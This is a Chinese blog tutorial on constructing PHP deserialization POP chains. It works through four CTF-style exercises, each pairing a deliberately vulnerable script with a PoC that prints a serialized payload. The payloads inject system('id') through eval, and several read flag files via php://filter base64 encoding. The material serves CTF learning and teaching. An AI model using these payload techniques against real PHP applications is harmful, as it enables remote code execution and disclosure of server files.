php中的pop链构造

已于 2024-05-11 09:26:13 修改
阅读量1k 收藏 12
点赞数 24
文章标签: php
于 2024-03-28 22:35:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80913334/article/details/137057026
版权

目录

系列文章:

1、php面向对象基本概念、类与对象:http://t.csdnimg.cn/5fRcg

2、序列化与反序列化基础:http://t.csdnimg.cn/cZOZv

3、php反序列化魔术方法:http://t.csdnimg.cn/1piyM

 一、成员属性赋值对象

例题1

二、魔术方法的触发规则

例题2

三、pop链构造,poc编写

1、pop链

2、poc编写

例题3

例题4

总结:

系列文章:

1、php面向对象基本概念、类与对象:http://t.csdnimg.cn/5fRcg

2、序列化与反序列化基础:http://t.csdnimg.cn/cZOZv

3、php反序列化魔术方法:http://t.csdnimg.cn/1piyM

 一、成员属性赋值对象

例题1
<?php
highlight_file(__FILE__);
error_reporting(0);
class index {
    private $test;    //$test=normal()
    public function __construct(){
        $this->test = new normal();
    }
    public function __destruct(){
        $this->test->action();    //__destruct()从$test调用action()
    }
}
class normal {
    public function action(){
        echo "please attack me";
    }
}
class evil {
    var $test2;
    public function action(){
        eval($this->test2);    //可利用漏洞点,eval()调用test2
    }
}
unserialize($_GET['test']);    //反序列化触发__destruct()
?>

解题思路:找到可利用漏洞点,给$test2赋值(命令注入),通过eval()调用test2实现命令注入

分析题目:

1、反序列化触发__destruct()从$test中调用action()

2、正常情况下我们会new index(),但实例化触发__construct()导致new normal()

3、new normal()会导致__destruct()从$test中调用的action()是normal类中的,而我们要的是evil类中的action()

解决思路:给$test赋值为对象new evil()

注意:序列化只能序列化成员属性,不能序列化成员方法

法一:实例化对象index(),自动调用__construct()

<?php
class index {
    private $test;
    public function __construct(){
        $this->test = new evil();    //成员属性$test=new evil()
    }
//    public function __destruct(){
//        $this->test->action();
//    }
//}
//class normal {
//    public function action(){
//        echo "please attack me";
//    }
}
class evil {
    var $test2 = "system('id');";
//    public function action(){
//        eval($this->test2); 
//    }
}
$a=new index();    //$a为实例化对象new index()
echo serialize($a);
?>
------------------------------------------
O:5:"index":1:{s:11:"%00index%00test";O:4:"evil":1:{s:5:"test2";s:13:"system('id');";}}

法二:直接调用属性test2

<?php
class index {
     var $test;
//    public function __construct(){
//        $this->test = new normal();
    }
//    public function __destruct(){
//        $this->test->action();
//    }
//}
//class normal {
//    public function action(){
//        echo "please attack me";
//    }
//}
class evil {
    var $test2;
//    public function action(){
//        eval($this->test2);
//    }
}
$a=new evil();
$a->test2="system('id');";
$b=new index();
$b->test=$a;
echo serialize($b);
?>
----------------------------------------
O:5:"index":1:{s:4:"test";O:4:"evil":1:{s:5:"test2";s:13:"system('id');";}}

由于原来的$test是私有属性所以需要手动在test前加上%00index%00

二、魔术方法的触发规则

魔术方法触发前提:魔术方法所在类(或对象)被调用

<?php
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;
    }
}
class sec {
    var $benben;
    public function __toString(){
        echo "toString is here!!";
    }
}
$b = 'O:3:"sec":1:{s:6:"benben";N;}';
unserialize($b);    //反序列化里的$b所调用的类sec里不包含__wakeup()故不触发__wakeup()
?>
---------------------------------------
//如果触发__wakeup()输出wakeup is here!!
例题2
<?php
class fast {
    public $source;
    public function __wakeup(){
        echo "wakeup is here!!";
        echo  $this->source;
    }
}
class sec {
    var $benben;
    public function __toString(){
        echo "toString is here!!";
    }
}
$b = $_GET['benben'];
unserialize($b);
?>

目标:显示wakeup is here!!toString is here!!

<?php
class fast {
    public $source;
//    public function __wakeup(){
//        echo "wakeup is here!!";
//        echo  $this->source;
//    }
}
class sec {
    var $benben;
//    public function __toString(){
//        echo "toString is here!!";
//    }
}
$a=new fast();    //实例化fast
$b=new sec();    //实例化sec
$a->source=$b;    //将source赋值为$b
echo serialize($a);    //在触发__wakeup()后执行echo从而触发__toString()    
?>
--------------------------------------
O:4:"fast":1:{s:6:"source";O:3:"sec":1:{s:6:"benben";N;}}

三、pop链构造,poc编写

1、pop链

在反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在php反序列化中有一种漏洞利用方法叫“面向属性编程”,即pop(Property Oriented Programming)。

pop链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload.

通俗例子:小测考砸了->不想复习了->考不好->不想考试,其实最开始的目标就是不想考试但却用一堆方法来实现不想考试

2、poc编写

poc(proof of concept)中文译作概念验证。在安全界可以理解成漏洞验证程序。poc是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。

编写一段不完整的程序,以获取所需要的序列化字符串。

例题3
 <?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class Modifier {
    private $var;
    public function append($value)
    {
        include($value);
        echo $flag;    //目标:触发echo,调用$flag
    }
    public function __invoke(){    //__invoke()触发时机:把对象当成函数
        $this->append($this->var);    //触发__invoke()调用append,并使$var=flag.php
    }
}

class Show{
    public $source;
    public $str;
    public function __toString(){  
        return $this->str->source;
    }
    public function __wakeup(){
        echo $this->source;
    }
}

class Test{
    public $p;
    public function __construct(){    //无用
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();    //可能把对象当成函数使用的地方
    }
}

if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>

方法:正向分析+反推法

目标:触发echo调用$flag

分析题目:

1、要触发echo需要触发append调用echo;要触发append需要触发__invoke()调用append

关联点1:触发__invoke(),触发时机:把对象当成函数使用

2、找到可能把对象当成函数使用的地方return $function(),$function被赋值为p,所以实则需要将p赋值为对象,且又要触发Modifier内__invoke(),所以$p=new Modifier(),但要将function()赋值为p则需要触发__get()

关联点2:触发Test中的__get(),触发时机:调用的成员属性不存在

3、找到Test中不存在的成员属性source,调用__wakeup()里的source触发echo,触发echo则触发__toString(),从而调用给$str再调用source,此时给$str赋值为new Test(),Test中不含有source触发 __get()

关联点3:触发Test中的__toString(),触发时机:把对象当成字符串调用

4、调用__wakeup()里的source触发echo,触发echo则触发__toString(),将$source赋值为new Show(),反序列化$source触发wakeup()

关联点4:触发__wakeup(),触发时机:反序列化unserialize之前

构造:

<?php
//flag is in flag.php
class Modifier {
    private $var = 'flag.php';
//    public function append($value)
//    {
//        include($value);
//        echo $flag;
//    }
//    public function __invoke(){
//        $this->append($this->var);
//    }
}

class Show{
    public $source;
    public $str;
//    public function __toString(){
//        return $this->str->source;
//    }
//    public function __wakeup(){
//        echo $this->source;
//    }
}

class Test{
    public $p;
//    public function __construct(){
//        $this->p = array();
//    }
//
//    public function __get($key){
//        $function = $this->p;
//        return $function();
//    }
}
$test = new Test();
$mod = new Modifier();
$show = new Show();
$show -> source = $show;
$show -> str = $test;
$test -> p = $mod;
echo serialize($show);
?> 
----------------------------------------
O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:" Modifier var";s:8:"flag.php";}}}
例题4
<?php
highlight_file(__FILE__);
error_reporting(0);
class Mod {
    private $var;
    public $name;
    public function append()
    {
        include("key.php");
        echo $flag;    //目标:触发echo调用$flag
        $this->name->source;
    }
    public function __toString(){
        $this->append();
    }
}

class Show{
    public $source;
    public $str;

    public function __destruct(){
        echo $this->source;

    }
    public function __wakeup(){
        echo $this->source;
        return $this->str->source;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = system();
    }

    public function __get($key){
        $function = $this->p;
        echo '<br>快了快了<br>';
        return $function();
    }
    public function __invoke(){
        echo '真的差一点点了<br>';
        $this->so($this->p);

    }

    public function so($value)
    {
        include($value);
    }
}

if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>

目标:触发echo调用$flag

1、要触发echo需要触发append调用echo;要触发append需要触发__toString()调用append;

关联点1:触发__toString(),触发时机:把对象当成字符串调用

2、找到可能触发__toString()的位置——Show里的echo $this->source或者是Test里的echo '<br>快了快了<br>'但是如果是Test里的最后会发现没法读取Mod里的key.php文件,故触发的是Show里的,读取到key.php后我们直接访问

<?php
class Mod {
    private $var ;
    public $name;
//    public function append()
//    {
//        include("key.php");
//        echo $flag;
//        $this->name->source;
//    }
//    public function __toString(){
//        $this->append();
//    }
}

class Show{
    public $source;
    public $str;

//    public function __destruct(){
//        echo $this->source;
//
//    }
//    public function __wakeup(){
//        echo $this->source;
//        return $this->str->source;
//    }
}

class Test{
    public $p;
//    public function __construct(){
//        $this->p = system();
//    }
//
//    public function __get($key){
//        $function = $this->p;
//        echo '<br>快了快了<br>';
//        return $function();
//    }
//    public function __invoke(){
//        echo '真的差一点点了<br>';
//        $this->so($this->p);
//
//    }
//
//    public function so($value)
//    {
//        include(;$value)
//    }
}
$show = new Show();
$mod = new Mod();
$show->source = $mod;
echo urlencode(serialize($show));
?>
---------------------------------------------
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A3%3A%22Mod%22%3A2%3A%7Bs%3A8%3A%22%00Mod%00var%22%3BN%3Bs%3A4%3A%22name%22%3BN%3B%7Ds%3A3%3A%22str%22%3BN%3B%7D

发现flag其实不在这个key.php文件需要读取cbcyl.php这个文件;此时就需要用到Test里的内容了,需要调用Test里的so需要触发__invoke();

关联点2:触发__invoke(),触发时机:把对象当成函数调用

3、找到可能把对象当成函数使用的地方Test里的return $function(),要触发__invoke()就需要触发__get();

关联点3:触发__get(),触发时机:调用的成员属性不存在

4、Test里不存在的属性有Show里的source和str和Mod里的name,由于前面已经用source触发了Mod里的name所以这里直接用source触发name来触发__get(),触发__get()后__invoke()触发调用p,将p赋值为php://filter/read=convert.base64-encode/resource=cbcyl.php读取cbcyl文件。

构造:

<?php
class Mod {
    private $var ;
    public $name;
//    public function append()
//    {
//        include("key.php");
//        echo $flag;
//        $this->name->source;
//    }
//    public function __toString(){
//        $this->append();
//    }
}

class Show{
    public $source;
    public $str;

//    public function __destruct(){
//        echo $this->source;
//
//    }
//    public function __wakeup(){
//        echo $this->source;
//        return $this->str->source;
//    }
}

class Test{
    public $p = 'php://filter/read=convert.base64-encode/resource=cbcyl.php';
//    public function __construct(){
//        $this->p = system();
//    }
//
//    public function __get($key){
//        $function = $this->p;
//        echo '<br>快了快了<br>';
//        return $function();
//    }
//    public function __invoke(){
//        echo '真的差一点点了<br>';
//        $this->so($this->p);
//
//    }
//
//    public function so($value)
//    {
//        include(;$value)
//    }
}
$show = new Show();
$mod = new Mod();
$show->source = $mod;
$show->source->name = new Test();
$show->source->name->p = new Test();
echo urlencode(serialize($show));
?> 
--------------------------------------
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A3%3A%22Mod%22%3A2%3A%7Bs%3A8%3A%22%00Mod%00var%22%3BN%3Bs%3A4%3A%22name%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3Bs%3A58%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dcbcyl.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

base64解码得到flag。

总结:

构造pop链首先要做的就是找到目标,接着使用倒推法分析代码逻辑,一个一个魔术方法的绕过其中可能有一些魔术方法是障眼法需要仔细甄别,还有像例题4一样的有两个文件(一个文件被隐藏)的就需要多尝试一个一个文件的读取。

技巧(一般题目):

1、目标:echo $flag

2、文件:$value = flag.php

3、__toString():找echo

4、__invoke():找return $***();

5、读取文件:php://filter/read=convert.base64-encode/resource=[文件名]。

lin0-0_0
关注
  • 24
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
POP构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4307
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文调用不可访问...
PHP构造二叉树算法示例
10-19
下面我们将深入探讨如何在PHP实现构造二叉树的算法。 首先,我们需要定义一个表示二叉树节点的类。这个类通常包含三个属性:`$data`用于存储节点的值,`$lchild`用于指向左子节点,`$rchild`用于指向右子节点。类...
php反序列化学习()--pop构造
qq_75120258的博客
04-24 791
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
php反序列化之pop构造
m0_62422842的博客
04-06 7440
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
POP构造
VZS_0的博客
02-23 1642
wakeup的方法很简单,只需要将反序列化后的字符串,将对象属性数量改大,如,O:3:“fin”:3:{s:1:“a”;//或者env (linux下的命令),向call_user_func(fun类)的$p传递system命令参数。//m类里面没有page这个属性,此时的page会被自动认为是属性/方法,而不是类,触发get。// md5($this->md51) == md5($this->md52) 弱等于。
PHP反序列化pop构造
Elite的博客
03-28 821
简单易懂的反序列化pop构造
php反序列化—POP 构造利用
cosmoslin的博客
09-14 2021
POP 构造利用 一、POP简介 1、POP 面向属性编程(Property-Oriented Programing) 常用于上层语言构造特定调用的方法,与二进制利用的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN的ROP,有时候反序列化一个对象时,由它调用的__wakeup()又去调用了其他的对象,由此可以溯源而上,利用一次次的“gadg
PHP构造pop1
YV_LING的博客
11-09 753
记录CTFpop构造的问题。
PHP构造pop2
YV_LING的博客
11-15 673
CTFshow“菜狗杯”的一道题目。
PHP反序列化构造POP小练习
末初的CSDN博客
05-13 869
一个师傅给的源码,来源不知,就当作小练习记录一下 <?php error_reporting(0); class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); } } .
ThinkPHP 6.x反序列化POP(三)1
08-03
在ThinkPHP 6.x,这个特定的POP起始于`vendor/league/flysystem-cached-adapter/src/Storage/AbstractCache.php`的`__destruct()`方法。 首先,我们需要设置环境来分析这个问题。安装ThinkPHP 6.0开发版本,...
ThinkPHP 6.x反序列化POP(一)1
08-03
值得注意的是,`Model`类是抽象类,不能直接实例化,攻击者需要找到它的子类,例如`Pivot`来构造POP。 总的来说,ThinkPHP 6.x的反序列化POP利用涉及多个类和方法的交互,需要对框架的内部工作原理有深入理解。...
Laravel8反序列化POP分析挖掘 .pdf
09-05
本文将深入探讨Laravel 8反序列化POP(Payload On Purpose)的分析与挖掘。 首先,我们需要了解什么是反序列化。反序列化是将之前通过序列化保存的数据结构恢复为原来的对象或数据的过程。在这个过程,如果设计...
PHP receiveMail实现收邮件功能
10-18
在本文,我们将深入探讨如何使用PHP的`receiveMail`函数来实现收邮件的功能。首先,我们要明白PHP读取收件箱是通过`imap`扩展实现的,因此在使用任何相关代码之前,确保你的服务器已经启用了`imap`扩展至关重要。 ...
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 370
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 264
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
1. NAS和SAN存储
u010198709的博客
06-13 532
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式化挂载使用。IQN名称格式: iqn.yyyy-mm.反域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 335
异常处理的基本原理是,当try块的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程的错误和异常情况,提高代码的稳定性和可靠性。在实际开发,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
php反序列化pop
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值